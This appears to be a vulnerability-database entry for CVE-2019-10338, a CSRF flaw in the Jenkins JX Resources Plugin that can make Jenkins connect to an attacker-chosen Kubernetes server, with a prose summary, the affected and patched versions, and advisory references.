CVE-2019-10338
Description
CSRF in Jenkins JX Resources Plugin allows attackers to make Jenkins connect to an attacker-controlled Kubernetes server, potentially leaking credentials.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CSRF in Jenkins JX Resources Plugin allows attackers to make Jenkins connect to an attacker-controlled Kubernetes server, potentially leaking credentials.
Vulnerability
The Jenkins JX Resources Plugin versions 1.0.36 and earlier contain a cross-site request forgery (CSRF) vulnerability in the GlobalPluginConfiguration#doValidateClient method. This form validation method did not require POST requests, making it susceptible to CSRF attacks, and also lacked proper permission checks [2].
Exploitation
An attacker with the ability to trick a Jenkins user with Overall/Read access into clicking a crafted link or visiting a malicious page can exploit this vulnerability. The attacker can specify a Kubernetes server and namespace, causing Jenkins to connect to that server [2].
Impact
Successful exploitation allows the attacker to have Jenkins connect to an attacker-specified Kubernetes server, potentially leaking service account credentials used for the connection. Additionally, the attacker can obtain the value of any attacker-specified environment variable for the Jenkins controller process [2].
Mitigation
The vulnerability is fixed in JX Resources Plugin version 1.0.37. The fix requires POST requests and Overall/Administer permissions for the form validation method [2][3]. Users should upgrade to the latest version immediately.
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.jenkins-ci.plugins:jx-resourcesMaven | < 1.0.37 | 1.0.37 |
Affected products
2- Jenkins project/Jenkins JX Resources Pluginv5Range: 1.0.36 and earlier
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
6- github.com/advisories/GHSA-qww5-p626-rfpfghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2019-10338ghsaADVISORY
- www.openwall.com/lists/oss-security/2019/06/11/1ghsamailing-listx_refsource_MLISTWEB
- www.securityfocus.com/bid/108747mitrevdb-entryx_refsource_BID
- jenkins.io/security/advisory/2019-06-11/ghsax_refsource_CONFIRMWEB
- web.archive.org/web/20200227033720/http://www.securityfocus.com/bid/108747ghsaWEB
News mentions
0No linked articles in our index yet.